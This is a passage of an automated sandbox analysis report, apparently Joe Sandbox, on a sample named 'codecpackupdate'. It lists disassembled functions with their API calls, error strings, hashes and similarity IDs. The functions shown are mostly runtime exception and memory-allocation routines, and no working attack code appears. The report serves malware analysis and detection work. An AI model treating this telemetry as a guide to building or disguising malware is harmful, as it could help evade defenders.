                                                                            • Part of subcall function 009FA551: __EH_prolog.LIBCMT ref: 009FA556
                                                                            • Part of subcall function 009FA551: Concurrency::cancellation_token::_FromImpl.LIBCPMT ref: 009FA565
                                                                            • Part of subcall function 009FA551: __CxxThrowException@8.LIBCMT ref: 009FA584
                                                                          Strings
                                                                          • Day of month is not valid for year, xrefs: 009F39AC
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2868320795.00000000009F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_9f1000_codecpackupdate.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: H_prolog$Concurrency::cancellation_token::_Exception@8FromImplThrowstd::exception::exceptionstd::runtime_error::runtime_error
                                                                          • String ID: Day of month is not valid for year
                                                                          • API String ID: 1404951899-1521898139
                                                                          • Opcode ID: 7bea77ecb473877c3e4b04949e98f3af106f24c00b554a8904ba0c9b2052aac0
                                                                          • Instruction ID: ce790ced31b66ff3d48f2938e2dbb7e70e884109102b68336589f2e6d88b276c
                                                                          • Opcode Fuzzy Hash: 7bea77ecb473877c3e4b04949e98f3af106f24c00b554a8904ba0c9b2052aac0
                                                                          • Instruction Fuzzy Hash: 8501717681420DEACF04EFA4D806AFEB778FF98710F40841AFD14A7250EB758A95C795
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 009FB033 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • std::exception::exception.LIBCMT ref: 009FFA4A
                                                                          • __CxxThrowException@8.LIBCMT ref: 009FFA5F
                                                                            • Part of subcall function 00A03A8F: _malloc.LIBCMT ref: 00A03AA7
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2868320795.00000000009F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_9f1000_codecpackupdate.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Exception@8Throw_mallocstd::exception::exception
                                                                          • String ID: bad allocation
                                                                          • API String ID: 4063778783-2104205924
                                                                          • Opcode ID: 75e771aaf039d619e9075de5eb6bc15319924ae1bdf75b5fd3029ba35536eb9e
                                                                          • Instruction ID: 6c7a8e7296a5ed9fc14d1d713bf58019a3f6f671a6d9e3cc90e28c4d18ccfb77
                                                                          • Opcode Fuzzy Hash: 75e771aaf039d619e9075de5eb6bc15319924ae1bdf75b5fd3029ba35536eb9e
                                                                          • Instruction Fuzzy Hash: D9F0A77060030D6BDF14EFA8DD559FF77ECAB04351B500529BA25E26C1EFB1EA048694
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 009F3C16 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • __EH_prolog.LIBCMT ref: 009F3C1B
                                                                          • std::bad_exception::bad_exception.LIBCMT ref: 009F3C30
                                                                            • Part of subcall function 00A023F7: std::exception::exception.LIBCMT ref: 00A02401
                                                                            • Part of subcall function 009FA58A: __EH_prolog.LIBCMT ref: 009FA58F
                                                                            • Part of subcall function 009FA58A: __CxxThrowException@8.LIBCMT ref: 009FA5B8
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2868320795.00000000009F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_9f1000_codecpackupdate.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: H_prolog$Exception@8Throwstd::bad_exception::bad_exceptionstd::exception::exception
                                                                          • String ID: bad cast
                                                                          • API String ID: 1300498068-3145022300
                                                                          • Opcode ID: 357f8bb49eaf75c18500e56de0787003d7ccd558c8d8040794c72ddda8c25b17
                                                                          • Instruction ID: c5042a009c2449d6f6a298b9cd65f0eec3ea73c6faab030964808159c2e0e71e
                                                                          • Opcode Fuzzy Hash: 357f8bb49eaf75c18500e56de0787003d7ccd558c8d8040794c72ddda8c25b17
                                                                          • Instruction Fuzzy Hash: 71F0A072D00908DBC709EF58E551AEAF774EF95311F10406EFE095B281CB729A56CB91
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 009F3881 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • __EH_prolog.LIBCMT ref: 009F3886
                                                                          • std::runtime_error::runtime_error.LIBCPMT ref: 009F38A5
                                                                            • Part of subcall function 009F1410: std::exception::exception.LIBCMT ref: 009F1428
                                                                            • Part of subcall function 009F88BF: _memmove.LIBCMT ref: 009F88DF
                                                                          Strings
                                                                          • Day of month value is out of range 1..31, xrefs: 009F3894
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2868320795.00000000009F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_9f1000_codecpackupdate.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: H_prolog_memmovestd::exception::exceptionstd::runtime_error::runtime_error
                                                                          • String ID: Day of month value is out of range 1..31
                                                                          • API String ID: 3258419250-1361117730
                                                                          • Opcode ID: 35148fc60ce893d24b0f9021329d059aa629541476f5546f423ba18c7c8f8a9e
                                                                          • Instruction ID: d1888c46320fa95c9466d318484b8a5ddc342a69f00770ae028b7d4609d20636
                                                                          • Opcode Fuzzy Hash: 35148fc60ce893d24b0f9021329d059aa629541476f5546f423ba18c7c8f8a9e
                                                                          • Instruction Fuzzy Hash: F2E09232E04108EBD714ABA4C812BECB778EB88750F40055AE90177280DBB6198087D5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 009F38CD Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • __EH_prolog.LIBCMT ref: 009F38D2
                                                                          • std::runtime_error::runtime_error.LIBCPMT ref: 009F38F1
                                                                            • Part of subcall function 009F1410: std::exception::exception.LIBCMT ref: 009F1428
                                                                            • Part of subcall function 009F88BF: _memmove.LIBCMT ref: 009F88DF
                                                                          Strings
                                                                          • Year is out of valid range: 1400..10000, xrefs: 009F38E0
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2868320795.00000000009F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_9f1000_codecpackupdate.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: H_prolog_memmovestd::exception::exceptionstd::runtime_error::runtime_error
                                                                          • String ID: Year is out of valid range: 1400..10000
                                                                          • API String ID: 3258419250-2344417016
                                                                          • Opcode ID: c6bec337283798929ed900c34a8bcdef3bad3c4286181a26c29f694666585424
                                                                          • Instruction ID: 11587acac0498b9dd9eca9ae52137673e98b54e056188e7fd5e50ce12e7ee494
                                                                          • Opcode Fuzzy Hash: c6bec337283798929ed900c34a8bcdef3bad3c4286181a26c29f694666585424
                                                                          • Instruction Fuzzy Hash: 06E09A72E48208ABDB18EBA8C812BECB768EB88750F00055AE94167280DBB61984C795
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 009F3919 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • __EH_prolog.LIBCMT ref: 009F391E
                                                                          • std::runtime_error::runtime_error.LIBCPMT ref: 009F393D
                                                                            • Part of subcall function 009F1410: std::exception::exception.LIBCMT ref: 009F1428
                                                                            • Part of subcall function 009F88BF: _memmove.LIBCMT ref: 009F88DF
                                                                          Strings
                                                                          • Month number is out of range 1..12, xrefs: 009F392C
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2868320795.00000000009F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_9f1000_codecpackupdate.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: H_prolog_memmovestd::exception::exceptionstd::runtime_error::runtime_error
                                                                          • String ID: Month number is out of range 1..12
                                                                          • API String ID: 3258419250-4198407886
                                                                          • Opcode ID: 01dd4becfdac2483481b733aaa647d12c5a6e42d9393dd8e98b915a53c67605c
                                                                          • Instruction ID: 50de21c6124499a63fbb46b2f4c6245d7a4d7677481398e6c278a031777668f4
                                                                          • Opcode Fuzzy Hash: 01dd4becfdac2483481b733aaa647d12c5a6e42d9393dd8e98b915a53c67605c
                                                                          • Instruction Fuzzy Hash: D1E09A32E08218ABD718BBA8C812BEDB768EB88750F00055AE90167280DBB2298087D5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 009F19C2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • TlsAlloc.KERNEL32 ref: 009F19CC
                                                                          • GetLastError.KERNEL32 ref: 009F19D9
                                                                            • Part of subcall function 009F1712: __EH_prolog.LIBCMT ref: 009F1717
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2868320795.00000000009F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_9f1000_codecpackupdate.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: AllocErrorH_prologLast
                                                                          • String ID: tss
                                                                          • API String ID: 249634027-1638339373
                                                                          • Opcode ID: d3e348341a44aa134a0d6e05a4e80a2d7e1aab49dbc470021b778a60d2bf4b3c
                                                                          • Instruction ID: bd6e0e0007d195f7be7d0b0baa3b9f13c47d217f604f1aa01114dd511e49c6aa
                                                                          • Opcode Fuzzy Hash: d3e348341a44aa134a0d6e05a4e80a2d7e1aab49dbc470021b778a60d2bf4b3c
                                                                          • Instruction Fuzzy Hash: 34E086319047149BC3007B78EC094DFBBA49A44371F10876AFDBE832D0EA30494187C6
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 009F3BD3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • __EH_prolog.LIBCMT ref: 009F3BD8
                                                                          • std::bad_exception::bad_exception.LIBCMT ref: 009F3BED
                                                                            • Part of subcall function 00A023F7: std::exception::exception.LIBCMT ref: 00A02401
                                                                            • Part of subcall function 009FA58A: __EH_prolog.LIBCMT ref: 009FA58F
                                                                            • Part of subcall function 009FA58A: __CxxThrowException@8.LIBCMT ref: 009FA5B8
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2868320795.00000000009F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_9f1000_codecpackupdate.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: H_prolog$Exception@8Throwstd::bad_exception::bad_exceptionstd::exception::exception
                                                                          • String ID: bad cast
                                                                          • API String ID: 1300498068-3145022300
                                                                          • Opcode ID: 9798f0f3abe1f87f7fdeb2dad17689a02efbb6fcbe975f865a0aee02a66046e3
                                                                          • Instruction ID: 42bfe73b73e20d68e6eaf3ceaad0a626efe8a46e3b0aa64a55cbc91f9ae943b2
                                                                          • Opcode Fuzzy Hash: 9798f0f3abe1f87f7fdeb2dad17689a02efbb6fcbe975f865a0aee02a66046e3
                                                                          • Instruction Fuzzy Hash: D7E01A71D14508DBC704EFA4E652BBCB774EF94301F008069EA065B2D0DB359A96CB96
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0040395C Relevance: 5.1, APIs: 4, Instructions: 53memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • HeapReAlloc.KERNEL32(00000000,00000050,?,00000000,00403724,?,?,?,00000100,?,00000000), ref: 00403984
                                                                          • HeapAlloc.KERNEL32(00000008,000041C4,?,00000000,00403724,?,?,?,00000100,?,00000000), ref: 004039B8
                                                                          • VirtualAlloc.KERNEL32(00000000,00100000,00002000,00000004,?,00000000,00403724,?,?,?,00000100,?,00000000), ref: 004039D2
                                                                          • HeapFree.KERNEL32(00000000,?,?,00000000,00403724,?,?,?,00000100,?,00000000), ref: 004039E9
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2867652941.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000003.00000002.2867652941.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_codecpackupdate.jbxd
                                                                          Similarity
                                                                          • API ID: AllocHeap$FreeVirtual
                                                                          • String ID:
                                                                          • API String ID: 3499195154-0
                                                                          • Opcode ID: d387fd4f3eab095a78f7bb9c90f865f0c98a2a282a57ddd88524d606926be08d
                                                                          • Instruction ID: ab7933d84ada2b962503ad88361c81f9e178ef349f2d38840b4e325d6782f2f4
                                                                          • Opcode Fuzzy Hash: d387fd4f3eab095a78f7bb9c90f865f0c98a2a282a57ddd88524d606926be08d
                                                                          • Instruction Fuzzy Hash: 3E118F712003019FD7218F29EE459167BF5FB84765711853AF152E71B0C372D961CF1A
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%